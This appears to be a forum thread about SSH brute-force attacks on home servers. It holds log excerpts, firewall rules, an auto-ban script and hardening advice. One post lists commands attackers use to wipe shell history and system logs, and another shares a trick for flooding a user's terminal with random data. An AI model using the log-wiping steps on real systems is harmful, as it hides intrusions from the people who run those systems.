Well anyway they are basicly botnets that sit on an IRC server some where in a certian channel waiting for the commands to launch an attack some some poor sole.  Imagine having over 300 workstations/servers on various backbones hitting your website/workstation/server it will and can take it off line atleast till your isp/firewall/hosting provider implements some type of protection agianst this. 

Even though they may have gotten in as a simple user does not mean they have not tried to gain root access either. I would recommend looking at your netstats  try ' netstat -nlp ' and double checking the ports. I would also recommend doing a ps -aux |grep (username) and then  checking the processes running by them  you can always do   ' ls /proc/pid#### -al  ' and it should tell you where the files are located. 

And for those running apache or a web server of any sort  check  /tmp,  /var/tmp , /dev/shm, you may also want to check incase you are running samba  /var/spool/samba  and also  /usr/local/apache/proxy or /user/local/apache/vbox. 

Seen to many exploits scripts and the starts of root kits to be installed or programs to obtain root by some means. 

I hope this gave you an idea where to look as well incase they may of installed programs else where besides there home directory. 

I would also check your log files agian, most likely the ips are spoofed, or through an open proxy or if they are stupid enough to use there own ip.. well you can always e-mail the ARIN contact or the ISP's upstream provider the logs. 

I know I may be a noob, but after working with redhat, freebsd, and yes even windows for a while I see a lot of exploits scripts, attack scripts and root level compromises where I work.

Hope this helps you and other people. 

NS

----------

## ThePsychotic2k

Unfortantually this is the way of the internet. More and more traffic is being generated everyday with these type of attacks

I feel so much safer in the last couple of months as my Uni has finally put a firewall up between external and internal connections (including blocking port 22). I havn't had any ssh connection attempts since, I only log other connetion attemps on port 22 and the only time I ever got anything is when I'm sshing in and i forget to put -p xxxx.

But before the nice firewall i just used these simple ideas (and still do):

-- run sshd on a non default port

-- don't allow ssh root access

-- use iptables to block any connetions to any port apart from what you use (only my ssh port for me)

----------

## electrofreak

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. 

 

Or at the very least turn off sftp and ftp and the like access and change the shell to /bin/false

----------

## AA

bcore: Since you only ssh into your machine from work you might want to set iptables to block all connections except those from your work ip address: assuming your work ip is static and not dynamic.

this should do it: someone please correct me if i'm wrong. as i am hardly an expert when it comes to iptables!

```

iptables -A INPUT -p tcp -s xxx.xxx.xxx.xxx/GG -d yyy.yyy.yyy.yyy/SS  --dport 22 -j ACCEPT

iptables -A INPUT -p tcp -s 0/0 -d yyy.yyy.yyy.yyy/?? --dport 22 -j DROP

```

where xxx.xxx.xxx.xxx is the work's gateway ip and yyy.yyy.yyy.yyy your home machine ip.

GG the work live ip subnet and SS your home machine subnet

----------

## jmckay123456789

I see people say "I see how many attempts there are on my machine, is there a way to stop it?".

I don't see why (or how) you need to stop attempts as long as your total security situation looks good. 

I'm very comfortable with my security, even though I get hundreds of attempts a day against me. My approach is pretty simple:

My firewall has the minimum number of ports open. So in you only want to ssh into the machine, you only need one port open. This means you only have to worry about one class of attacks, namely attacks on your ssh access.

So how do we secure our ssh? Well what are the vulnerabilities?

1) Flaws in the program/protocol. I feel good about these kinds of problems as long as I keep my ssh software up to date. There is a theoretical possibility that a black hat finds a vulnerability and exploits it before the maintainers of the ssh software ever find out. But if you have someone that good trying to hack your system, you have other problems.

2) Weak passwords, dictionary attacks, etc. My approach has been to:

a) Restrict the world of logins that work by editing my sshd config. I have disallowed root access, and in fact I disallow all access except by certain users. In my case that is just me plus my wife. So in addition to breaking my password they would have to guess one of our usernames. It is no inconvenience to me not to have root access because I can just su root as soon as I login.

b) Have strong passwords. Since there are only two usernames with access (thanks to above), I only have two passwords that I have to ensure are strong. 

So to summarize:

Firewall allows only ports you need

Keep your ssh software up to date

Restrict users who can login remotely to those that need that capability

Make sure those users have strong passwords

With those rules in mind, when I see that I have had hundreds of attempts it doesn't really bother me. 90% of them are attempts against  the root user, most of the rest are either against users like "www" or "mysql" or against names like "jim", "sarah", or other common names. I have yet to see a single attempt at either of my real usernames. And should they do that, they will still have to crack a strong  password. 

I feel like an elephant being attacked by gnats. It just doesn't bother me.

----------

## GNUtoo

boh i don't know if i sould post it (it could give some ideas to some person) 

i'me a little bit lazy so i've not read all the post(it's long to read) but i could help a bit

i suppose that you have talked about securising the computer

but you have may have forgeted to securise the modem ...

some modems have defaults passwords...

so change the passwords

maybe the firmware could also be upgraded (in some case there are some security holes)

----------

## ruurd

honesty makes me have to say that I didn't read all 12 pages, skipped the middle part, so this post might make no sense at all.  Please ignore if so.

I also noticed the SSH stuff, and I made a script to kick them out for a day after 15 attempts.  I know it's *no* protection mechanism, so please look 2 posts up and do what's said there, but following the 90% reasoning: the script just reduces the chance that they might succeed a little, and just reduces the mess in your /var/log/messages or /var/log/auth.

To run this script you will need a working iptables and 'at' (emerge at).

```

#!/bin/sh

# vim:ts=4:sw=4:tw=0

# Ruurd Koons 24th April 2005

# This script scans for failed login attempts and pushes the IP of

# frequent failing clients on the iptables list, which are removed

# using an at job afterwards.  The main purpose of this script is

# to stop ssh login attacks in an early stage of the process.

# Design note: it seems that a grep in front of awk activates input

# buffering, which delays the actual awk processing.  The piped

# greps below are only because of this reason done in awk itself.

# grep sshd | grep "Failed password" | grep -o -e "\([0-9]\{1,3\}\.\)\{3\}[0-9]\{1,3\}" | 

SCANFILE="/var/log/messages";

LOGFILE="/var/log/banned_scanners";

if [ "$1" != "" ];

then

   comm="$1";

else

   comm="tail --max-unchanged-stats=5 --follow=name $SCANFILE";

fi

if [ "$2" == "-d" ];

then

   debug=1;

else

   debug=0;

fi

$comm | awk -v debug="$debug" -v logfile="$LOGFILE" '

   BEGIN   { treshold = 15; timeout = 30 * 60; }

         {

           if ($5 ~ /^sshd\[[0-9]+\]:$/ &&

               $0 ~ /Failed password/ &&

               $(NF - 3) ~ /[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?$/)

           {

              $0 = $(NF - 3);

            if ($0 ~ /^::ffff:/) $0 = substr($0, 8);

              if (debug + 0 != 0) print $0, attempt["count"$0], attempt["time"$0];

            

            attempt["count"$0] += 1;

            if (systime() - attempt["time"$0] > timeout) {

              attempt["count"$0] = 1;

            }

            attempt["time"$0] = systime();

            if (attempt["count"$0] > treshold &&

              $0 !~ /0+\.0+\.0+\.0+/ &&

              $0 !~ /255/)

            {

              if (debug + 0 == 0) {

                 print systime() " " $0 >> logfile;

                 system("iptables -A INPUT -j DROP --source " $0);

                 system("echo iptables -D INPUT -j DROP --source " $0 " | at now + 1 day >& /dev/null");

              } else {

                 print systime() " " $0;

              }

              attempt["time"$0] = null;

              attempt["count"$0] = null;

            }

           }

         }

   END      { }

' &

```

The log that is written allows for later use such as permanent banning of returning IP's or distribution between serveral hosts in for instance a university network.

To recap what the script does:

- it adds the IP to the iptables INPUT chain when an IP fails to login using SSH

  * over 15 times

  * within 30 minutes

- the 'ban' lasts currently one day

- the ban is recorded in a small logfile, where the IP is prepended by the current UNIX epoch time

The main reason to ban only for a day is to keep the iptables chain small, as it will grow rapidly if you ban all, and most of them never come back after a day (from my experience).

I thought I'd share my script, maybe someone likes it also.

Cheers!

----------

## bluedevils

In addition to using firewalls to limit access to work's IP only, you could also set either a cron for sshd on the box or a rule on the firewall to make it only available during work hours.  This should help to limit the time they have access to that port.  A cron on the box might be easier to manage if you need to do extra stuff outside of work hours.

----------

## Dreadfull

```

May 14 07:46:22 godshells sshd[9499]: Did not receive identification string from ::ffff:201.243.124.239

May 14 07:51:11 godshells sshd[9542]: Invalid user jordan from ::ffff:201.243.124.239

May 14 07:51:11 godshells sshd[9542]: reverse mapping checking getaddrinfo for 201-243-124-239.genericrev.cantv.net failed - POSSIBLE BREAKIN ATTEMPT!

```

how nice ..

i was sleeping at that hour and also noone knew my ip ..

----------

## sixtymhz

If anyone wants to know how these guys are hiding their tracks...

history -c

> .bash_history

cat /dev/null > /var/log/messages

cat /dev/null > /var/log/wtmp

Just to name a few.

Also wouldn't be a bad idea to 

chmod 700 /usr/bin/wget

chmod 700 /usr/bin/perl

----------

## freebies_11

 *sixtymhz wrote:*   

> chmod 700 /usr/bin/wget
> 
> chmod 700 /usr/bin/perl

 

This is an incredibly bad idea.

----------

## moocha

 *Heelios wrote:*   

>  *sixtymhz wrote:*   chmod 700 /usr/bin/wget
> 
> chmod 700 /usr/bin/perl 
> 
> This is an incredibly bad idea.

 Indeed.

That will break a lot of packages and will help exactly nothing - what's to prevent the attacker from simply uploading a statically linked wget? Nothing, that's what.

If you want to prevent certain accounts from doing networking, you can always use iptables' owner-match support, for example.

----------

## sixtymhz

eh, well I guess if you are paranoid, it wouldn't be to bad >_< 

Plus I was speaking in terms of already being hacked. My friend was hacked with the hacker using wget to exploit his forum and so forth. Setting the wget and perl to 700 stopped him from doing anything else untill he got his server up and running again (and updated!!)

But thanks for the insight.

Could you give a better example of the IPTABLES owner-match deal please?

----------

## moocha

 *sixtymhz wrote:*   

> eh, well I guess if you are paranoid, it wouldn't be to bad >_<

 Yes it would. Every application depending on perl (and those are legion) will break for a non-root user, thus forcing you to use root more, thus creating more security holes than it "fixes". *sixtymhz wrote:*   

> Plus I was speaking in terms of already being hacked.

 If a breakin already happened then it's ten times as pointless - if the enemy is already inside it's too late to fill the moat.... *sixtymhz wrote:*   

> Could you give a better example of the IPTABLES owner-match deal please?

 See the iptables tutorial  :Smile: . IIRC, owner-match comes in the standard gentoo-sources too, not only in hardened, so it shouldn't be hard to figure out.

----------

## sixtymhz

Cool deal, thanks  :Wink: 

----------

## sixtymhz

Anyone have experience on setting up honey pots??

----------

## Karak

You know, like so many others, I saw this thread and after reading it thought "hrmm... maybe I should look at my sshd logs..." and holy god! Look at this!

May 24 04:00:50 [sshd] Server listening on 0.0.0.0 port 22.

May 24 13:33:13 [sshd] Did not receive identification string from 67.102.203.251

May 24 13:46:22 [sshd] Invalid user anonymous from 67.102.203.251

May 24 13:46:23 [sshd] Invalid user passwd from 67.102.203.251

May 24 13:46:25 [sshd] Invalid user chuck from 67.102.203.251

May 24 13:46:26 [sshd] Invalid user darkman from 67.102.203.251

May 24 13:46:27 [sshd] Invalid user hostmaster from 67.102.203.251

May 24 13:46:28 [sshd] Invalid user jeffrey from 67.102.203.251

May 24 13:46:30 [sshd] Invalid user loverd from 67.102.203.251

May 24 13:46:31 [sshd] Invalid user eric from 67.102.203.251

May 24 13:46:32 [sshd] Invalid user lauren from 67.102.203.251

May 24 13:46:38 [sshd] Invalid user mark from 67.102.203.251

May 24 13:46:39 [sshd] Invalid user sin from 67.102.203.251

May 24 13:46:40 [sshd] Invalid user richer from 67.102.203.251

May 24 13:46:42 [sshd] Invalid user fluffy from 67.102.203.251

May 24 13:46:43 [sshd] Invalid user gold from 67.102.203.251

May 24 13:46:44 [sshd] Invalid user tomcat from 67.102.203.251

May 24 13:46:46 [sshd] Invalid user cosinus from 67.102.203.251

May 24 13:46:47 [sshd] Invalid user httpd from 67.102.203.251

May 24 13:46:48 [sshd] Invalid user squirrelmail from 67.102.203.251

May 24 13:46:50 [sshd] Invalid user trash from 67.102.203.251

May 24 13:46:50 [sshd] Invalid user kent from 67.102.203.251

May 24 13:46:52 [sshd] Invalid user ace from 67.102.203.251

May 24 13:46:53 [sshd] Invalid user backup from 67.102.203.251

May 24 13:46:54 [sshd] Invalid user fish from 67.102.203.251

May 24 13:46:55 [sshd] Invalid user java from 67.102.203.251

and that is a very small snippet! Wow okay... time to bone up on security!

----------

## kitana_ann

If it wasent for this thread I would not think for a minute that my server was in jeperdy! Here´s what I found in my log:

```
May 30 02:04:19 server sshd[18798]: Accepted keyboard-interactive/pam for me from 143.97.2.35 port 18248 ssh2

May 30 02:04:19 server sshd(pam_unix)[18804]: session opened for user me by (uid=0)

May 30 02:04:42 server su(pam_unix)[18818]: session opened for user root by me(uid=1000)

May 30 02:04:50 server su(pam_unix)[18818]: session closed for user root

```

The creepy part is that I am not awake at that time and I dont know who´s ip that is. I checked the .bash_history for both root and user and I only see code that I have executed  :Rolling Eyes: . I am soo confused over what happend? Any ideas on where else I could check?

----------

## moocha

 *Karak wrote:*   

> You know, like so many others, I saw this thread and after reading it thought "hrmm... maybe I should look at my sshd logs..." and holy god! Look at this!
> 
> May 24 04:00:50 [sshd] Server listening on 0.0.0.0 port 22.
> 
> May 24 13:33:13 [sshd] Did not receive identification string from 67.102.203.251
> ...

 Er, if you don't look at the logs, why even bother logging at all? Resource hog if they're not used.

----------

## moocha

 *kitana_ann wrote:*   

> If it wasent for this thread I would not think for a minute that my server was in jeperdy! Here´s what I found in my log:
> 
> ```
> May 30 02:04:19 server sshd[18798]: Accepted keyboard-interactive/pam for me from 143.97.2.35 port 18248 ssh2
> 
> ...

 The attacker got root privileges so that machine is completely compromised. I wouldn't trust it for anything anymore. Back up your user data, reformat and reinstall. You also have to assume your account on each and every other machine you've logged on from this machine was compromised, and so on and so forth in a nice chain. Basically, reformat, reinstall, change all your passwords for any purpose (be it email accounts, webmail accounts, various sites, etc etc) from a machine you trust, use strong passwords or no passwords at all (S/Key or PKI authentication), and keep up to date with glsa-check. If the compromised machine or any of the other machines you logged into also has other users, have them do the same if possible, and at least have them change their passwords when logged in from a trusted machine.

As to .bash_history - its value as evidence is zero. Try it for yourself - log into an account, type some commands, kill your shell with

```
kill -9 $$
```

then log in again and check .bash_history. The commands you typed won't be there. The only way to be absolutely sure of what was typed is to have a kernel with a strong security infrastructure, have it log all execs, and have it send logs to a physical line printer - paper printouts at a remote location are quite hard to fake  :Wink: . Such measures are overkill on home machines though, so it's a tradeoff between security and usability, as always.

----------

## Karak

 *moocha wrote:*   

> Er, if you don't look at the logs, why even bother logging at all? Resource hog if they're not used.

 

Of course you're right, I came down with a temporary case of pendejitis... I'll be looking at the log files very closely from now on.

----------

## kitana_ann

Thanx for the tip! I found out who the IP belongs to and it is my job. At my work computer I log into my server. But the wiered part is how it could have loged in in the middle of the night. I use the program putty and filezilla to log in as via ssh. Do you guys now any security holes with those programs that could have cause this behavior? I usally only lock my computer when I go home, I will from now on shut it down.

----------

## Karak

Do you save passwords at all on your work computer? Do you use the same password for more than one account?

----------

## kitana_ann

All my passwords are diffrent on every computer/account. Only thing is that I have automatic login in filezilla. The login is for my ordenary user not root. That makes me wonder how root got logged in?  :Rolling Eyes: 

----------

## Karak

Does someone else use your computer when you're not there?

----------

## kitana_ann

Yes some users may use my compuer. But the only way to get access is to shut down the computer by force and then log in with there account. Since I lock my computer. What are you sugessting?  :Confused: 

----------

## Karak

Well even if they have to reboot the machine, the programs installed (PuTTy) is still there and can be accessed, do you have a profile saved there for your home machine, or do you type in the IP address everytime you connect? If you've got a profile saved there, that explains how someone with your work IP knew to connect to your home machine... as to how they got your root password I can't say, but there is always a way...

----------

## kitana_ann

Well I do not have a profile, I always type in the ip address everytime. It is really weired.... :Rolling Eyes: 

Hate to reinstall, reinstallation takes time and no saftety on the net during that time. But I guess thats the price you have to pay if your not carefull. 

Thanx for your post.

----------

## freebies_11

Your fault for naming your user 'me' I would say.

----------

## smurfd

once hacked, consider everything you had on the disk, to be possible threats.

reformat, re-install, beef up security.

----------

## kitana_ann

 *Heelios wrote:*   

> Your fault for naming your user 'me' I would say.

 

I changed my user name when I pasted the text in this post. Also my server isen´t named "server".  :Rolling Eyes: 

----------

## cyberb0b

 *kitana_ann wrote:*   

> But the wiered part is how it could have loged in in the middle of the night.

 

Maybe your clocks are not correct.  Either that or you have a split personality, because:

 *kitana_ann wrote:*   

> May 30 02:04:42 server su(pam_unix)[18818]: session opened for user root by me(uid=1000)

 

I believe this log statement means the user "me" typed "su" and entered the correct root password.  Either you use really simple passwords, or you have been hacked by the guy on the other side of the mirror.

----------

## Freman

I love the sight of people in a panic over their logs saying "Hi, someone tryed to log in with this username but failed"

That's all it is folks.

Sure you should beef up your security with port knocking, firewalls, non-default ports, pubkey auth, no-root access, restricted user access. But for the better part as long as it keeps saying "failed" you're fine.

All a firewall does if they're failing is silence your logs.

I myself run scripts that aggregate ip's from mail logs, ftp logs, web logs and sshd logs with various levels of "paranoia"

I also run 2 layer firewalls - a gateway / router running tiny bsd implementation and individual host firewalls on every machine.

* one worm like attack on http results in instant 48 hr block on all firewalls

* three relay rejects on email results in 48 hr block on all firewalls

* three wrong passwords on ssh result in 48 block on all firewalls

* bogus data / three wrong logins on ftp result in 48 block on all firewalls.

The only time anyone's ever broken in to one of my boxes was way back before I implemented this system and it was an exploit in proftpd that let them in, not ssh.

My firewalls above arn't aimed so much at security, just cutting back the logging.

Still I wouldn't mind being able to run a daemon in front of syslogd to intercept and act on log messages as they happen rather then in cron...

Something I tell my users: Face it, there's heaps of bogus traffic running around on the internet, 99% of it can be safely ignored if you are using basic security proceedures and common sence. No point harping up evertime a login fails.

----------

## moocha

 *Freman wrote:*   

> All a firewall does if they're failing is silence your logs.

 Wrong.

----------

## linuxgeekery

Hmmm... from bcore's logs it seems that the hacker is tricky. To host his IRCBot, virus, what ever it is  :Razz: , he uses free hosting sites using subdomains. 100free.com, netfirms, etc. When you do a whois, it tells you about the hosting site, not the subdomain

----------

## linuxgeekery

Wait a fcking second...

I got someone trying to get at my box from the same ip 131.234.36.152! And what's special is it was on my Winblows box. Yes, I still have one (for a tad of gaming  :Razz: )

----------

## darker

Starting from the beginning of April there have been 5517 attempts on my machine.  None have gotten through.

----------

## CptPajamas

i've been using xinetd and tcp wrappers to secure SSH access exclusively from trusted IP ranges / IP's.

hosts.allow and hosts.deny with appropriate /etc/services entries is king.

----------

## edudlive

I don't have sshd running  :Smile: , I'll check my server.

Doesn't seem it has had any attempts to gain access other than my friend using my FTP

----------

## moocha

 *darker wrote:*   

> Starting from the beginning of April there have been 5517 attempts on my machine.  None have gotten through.

 That you know of  :Wink: .

</UtterParanoia>

Sorry, couldn't help myself  :Very Happy: .

----------

## Varg_

As of this morning I have had a little over two million ping, connection, and login attemps on my server.....and zero logins  :Smile: 

----------

## Oid

16,500 attempts in the last few monthes on one of the boxes here. (the only one on 22).... Initially was your standard test/guest/admin, etc attempts, then progressed on to bruteforcing the root password, and finally has now moved on to a dictionary list of names being tried.

----------

## dake.cdx

Install this to quickly get ride of dictionnary attempts : 

http://fail2ban.sourceforge.net

I installed this on my server and it perfectly works by adding the faulty ip in iptables for 10 minutes (the attack script will then timeout and move to the next ip).

----------

## christsong84

 *dake.cdx wrote:*   

> Install this to quickly get ride of dictionnary attempts : 
> 
> http://fail2ban.sourceforge.net
> 
> I installed this on my server and it perfectly works by adding the faulty ip in iptables for 10 minutes (the attack script will then timeout and move to the next ip).

 

I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip  :Razz: 

----------

## dake.cdx

 *Quote:*   

> I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip

 

Did you try to reverse the IPs ? About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

----------

## moocha

 *dake.cdx wrote:*   

> About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

 Easy - it's because those contries have undertaken building a highly available broadband infrastructure targeted at average consumers. In other words, Big Pipes and Inexperienced Admins.

----------

## bitwise

 *dake.cdx wrote:*   

> Install this to quickly get ride of dictionnary attempts : 
> 
> http://fail2ban.sourceforge.net
> 
> I installed this on my server and it perfectly works by adding the faulty ip in iptables for 10 minutes (the attack script will then timeout and move to the next ip).

 that looks nice, but does it have any 'whitelist' features? I believe there have been a few of utils like this, but a lot of them could be tricked into blocking certain known good machines (say, DNS) by spoofing their ip.

of course, the time limit makes this a little less of a problem.

----------

## christsong84

 *dake.cdx wrote:*   

>  *Quote:*   I use that too...though I haven't had many attempts lately...I think most of them gave up except the automated scripts randomly hitting our ip 
> 
> Did you try to reverse the IPs ? About 90% of the banned IPs are from Asia (Korea, China, Japan), I'm still wondering why there are so many attempts from these countries.

 

I reverse the ip's and e-mail for each ip to the ISP in charge of them and ask for investigation...most of the time nothing gets done.  However I've really only had about 1/5th of my attacks coming from asia (the last one came from a high school...I was amused and e-mailed hte school (korea))...I had one come from germany....but over 1/2 for me are in the US...comcast users  :Razz: 

----------

## Proton

Well, my computer is getting probed by pakistanese bots... ugh...

 *Quote:*   

> Jun 11 15:27:47 [sshd] Invalid user test from 202.163.126.42
> 
> Jun 11 15:27:51 [sshd] Invalid user admin from 202.163.126.42
> 
> Jun 11 15:27:53 [sshd] Invalid user admin from 202.163.126.42
> ...

 

I think I'll just finally get at it and install a firewall. And just block everything outside of Europe.

----------

## christsong84

changing the ports, while not that effective against real hackers...is great against bots  :Smile: 

I actually don't get any hits on my new ssh port ^_^

----------

## foofoo

 :Twisted Evil:   :Shocked:   :Laughing: 

----------

## vorok

For those of you who don't have anything better, here's the script I use to parse through my sshd logs.

```
#!/bin/bash

#looks for suspicious activities within the ssh logs in /var/log/sshd

logFile='/var/log/sshd/current'

grepString='(Invalid)|(BREAKIN)|(AllowGroups)'

if [ -n "$(cat $logFile | egrep $grepString)" ]

then

        cat $logFile | egrep $grepString | /usr/sbin/sendmail -i -f root -bm sshdMonitor@localhost

fi;

```

Make a daily cronjob out of it and it will e-mail you once a day if there are any intrusion attempts (Non-existent users, unable to reverse map, or user not in AllowGroups).  The output is a bit lengthy if you get 100+ per day, but it is nice to know that if you aren't getting any mail then you are probably safe.

BTW, those of you who don't already, limit your ssh logins to AllowUsers or AllowGroups (I have a 'remote' group, anyone not in it does not get in) and make sure that root cannot ssh into your box.

----------

## Diezel

Combinig a little IPtables script with cron and grep should be quite useful.

I wrote a script with the help of Linux server hacks book and the help of this forum.

Now the only thing we need is a cron that get's the IP:s of attackers and echo it to /etc/blacklist and reruns the script to deny them access, grep should work fine. It would be intressting to see why they were rejected so the script should also add something to the blacklist, like failed login ssh 5 times. And why not go trough snort logs aswell.

I'm not that good at scripting but if someone is to do this it would be nice.

The script can be found at http://www.nixadmins.net/downloads

// Mats

----------

## memoi2001

My box is running behind a hardware firewall with it's default policy denying everything,

bit of a bitch to set-up when you add anything but it's the most secure way of doing things.

add to that ssh on a non-default port, dynamic ip, non-dictionnary based usernames and passwords and no unessesary daemons running...

rock solid security, even I can't get in half the time  :Wink: 

----------

## Adrien

 *electric_hamster wrote:*   

>  *kalisphoenix wrote:*   I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right? 
> 
> Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:
> 
> ```
> ...

 

I'm pretty curious about what it does exactly??? Anyone knows?  :Smile: 

----------

## menetto

Does a program exist to test the passwords of your users in a system? If they are vulnerable for a dictionary attack, etc.

----------

## nephros

 *menetto wrote:*   

> Does a program exist to test the passwords of your users in a system? If they are vulnerable for a dictionary attack, etc.

 

the canonical tool for this is called "John the Ripper":

emerge app-crypt/johntheripper

----------

## zx2c4

Just this morning I noticed in my /var/log/messages that I was getting many break in attempts. To make it easier,

```
sudo cat /var/log/messages | grep sshd | less
```

That's when I decided to change the default port away from 22 for sshd by

```
sudo nano -w /etc/ssh/sshd_config
```

Then changing the appropiate param.

Do you guys think a differnt port is enough or should I install knockd?

----------

## mikkoloo

here is my little story, guess it applies to this thread. got this attempt this night. thinking of reporting it.

attempt to an ssh shell

i post some logs and a xtraceroute pic, enjoy  :Smile: 

www.miccet.info/hack

----------

## nevynxxx

 *zx2c4 wrote:*   

> 
> 
> ```
> sudo cat /var/log/messages | grep sshd | less
> ```
> ...

 

```
[sudo] grep sshd /var/log/messages [| less]
```

Why invoke cat when grep is *designed* to parse files?

----------

## lixer

I just went through my log files and found several crack attempts against my box.

I just setup this box over the past weekend. Script kiddes are already trying to break in. Arrgghhhh script kiddies. 

Guess its time to setup a firewall.

By the way here is list of cracker's IP's:

211.139.95.154

210.76.59.29

64.119.187.148

62.236.56.42

cncln.online.ln.cn

210.1.71.6

200.29.149.130

reverse.doruk.net.tr

195-134-158-50.pipeline.ch

What's a simplest yet effective firewall to setup?

----------

## nhaggin

 *Quote:*   

> I'm pretty curious about what it does exactly??? Anyone knows? 

 

It grabs bytes from the kernel's random number generator and dumps them to the terminal of the user specified in the argument to write(1); in this case, the guy trying to hax0r you over ssh. There is actually a small typo; it should be 

```
cat /dev/urandom | write $USER
```

instead.

----------

## kalisphoenix

Good times.  I'm working on securing my server (Sun Ultra 10).  I figure it's safe from binaries, but the perl scripts that can be run through PHP vulnerabilities scare me.  (Keep in mind that I'm not a programmer, so if I just said something stupid, forgive me)

So I'm working on getting SELinux, UML, and a few other things (a nice partition table, /etc/securetty tightening, disabling unneeded SUIDs, disabling module loading in the kernel) installed this time around.  I'm using the Gentoo Hardened, Gentoo SELinux, Gentoo UML, and some other handbooks/wiki entries as my bibles.  I figure I'll install a base system with these tricks, really tighten up the OS and get rid of everything that isn't absolutely necessary for the base system, and then do my apache'ing et cetera from a UML.  Does that make good sense?

Good hint on the fail2ban prog.  I'll certainly install that too. 

Does anyone have any new (since this thread kinda died) suggestions for tightening security that AREN'T in the handbooks/guides I've listed above?

I'm considering disabling the root password entirely and doing everything through sudo, since I've gotten used to not having a root user on OS X.  Anyone done this?  Does it bork the bloody hell out of your system?

Hmm... maybe I should search...

----------

## insomniac

Today I checked my logs and found a lot of invalid login attempts. since I use SSH from work and it goes through proxy servers and stuff (I work at HP) I decided the best way was to change to public key authentication. Took me 5 minutes - done... I feel a little more secure now 8)

----------

## segedunum

Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.

If you're behind a firewall that restricts outgoings that blocks VPN connections then I could understand but that's not very likely, and even then, it would have to allow SSH to get remote access. If you're in that position then have to make a serious considered decision about whether it's worth the risk to remote admin your server through a publicly available SSH service running on it. If you're having to consider configuring your firewall to disallow bots coming from Pakistan or somewhere else, talking about portknocking, worrying about totally securing your passwords or you're having to parse your logs like crazy as a knee-jerk reaction then you're simply never going to get ahead. I can get full remote access to my server but there are no dodgy unsuccessful SSH logins in my logs  :Wink: .

Sorry, but I think anyone who runs anything publicly like this is just plain silly - and I'm being polite there.

----------

## LostControl

Maybe you could try Fail2Ban. It will allow you to have an external access to your SSH server and will block script kiddies trying to break in  :Wink:  It runs on my home server and blocks 3-4 attempts a day.

Ebuilds are available on the website or in bugzilla.

----------

## christsong84

 *segedunum wrote:*   

> Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.
> 
> If you're behind a firewall that restricts outgoings that blocks VPN connections then I could understand but that's not very likely, and even then, it would have to allow SSH to get remote access. If you're in that position then have to make a serious considered decision about whether it's worth the risk to remote admin your server through a publicly available SSH service running on it. If you're having to consider configuring your firewall to disallow bots coming from Pakistan or somewhere else, talking about portknocking, worrying about totally securing your passwords or you're having to parse your logs like crazy as a knee-jerk reaction then you're simply never going to get ahead. I can get full remote access to my server but there are no dodgy unsuccessful SSH logins in my logs .
> 
> Sorry, but I think anyone who runs anything publicly like this is just plain silly - and I'm being polite there.

 

My servers are co-located 3 stories below ground on the other side of town.  I sign in from the office for daily maintenance and checks.  It's not on it's own network so I don't set up a VPN connection...SSH does the job just fine for me.  Like I've said before, only bots have hit my servers so changing the port seemed to do the trick.  :Smile:   (and the whole key based logins and such other obvious procedures  :Smile:  )

----------

## alex6z

I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  

2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computer are just toys for me  :Smile: 

----------

## nhaggin

 *Quote:*   

> Can anyone tell me why on Earth anyone is running a damn SSH server publicly?! For goodness sake, if you need admin access to your server outside then install yourself a damn VPN to do it such as OpenVPN or an IPSec one.

 

The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to.

It is currently fashionable for 1337 $cr!p+ k!ddi3z to hit systems running SSH. Security-compromising errors have been found before in ipsec-tools, and if one wanted one could probably attempt to mount an attack against IPSec. OpenVPN is a great piece of software (I use it extensively), but I'm sure that a programming error will slip in at some point and that an attack could be devised against it. But for right now, SSH is a far more inviting target: so many more people use it, and there is a much simpler method of attack if the admin has open accounts on his box.

----------

## red-wolf76

Strange behaviours on my home network tonight, dudes...

Ok, so I got a nice little home network going at my place which my girl-friend, her parents and I use (yeah, I know it's corny to live in with the Ps but hey, it saves rent!). Topology is as follows:

Router ------------ Parents PC (WinXP)

|

Switch ------------ Girl-friend's PC (Gentoo 2.6.12-r6)

|------------------- My PC (Win2000)

|------------------- Bragi (D-Link Printer Server)

\--- Balder (Wireless Bridging Access Point) ---)) ((--- Asgard (WBAP)

Asgard is connected to another switch and two more boxen are hooked onto there, "dagon" and "nyarlathotep" which are also running Gentoo. The router does have an inbuilt "firewall", but some ports are mapped to the different boxen for direct Messaging connections. And some online gaming stuff (AAO, mostly but only to the Win2000 box). The router (and modem) is a German Zyxel Prestige 660HW with the "Arcorized" firmware, since we got it from Arcor, our DSL-Provider.

Now tonight (I'm not at home, mind you) I get a call from my gf that computers are behaving strangely. First of all, she got a window telling her "Just looking in. The boring guy!" (written in German, though!) which according to her description looks much like a simple X-Window. Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times. So I tell her to take the router off-line by turning off the power for it and the magic stops.

Now, I'm not in a position to verify all this, but I've no reason to believe she's lying. What has happed? Possible suspect for this is a guy who turned annoying on ICQ (she uses GAIM for that and YAHOO! on her box) and got told off by her.

Conclusions according to current knowledge:

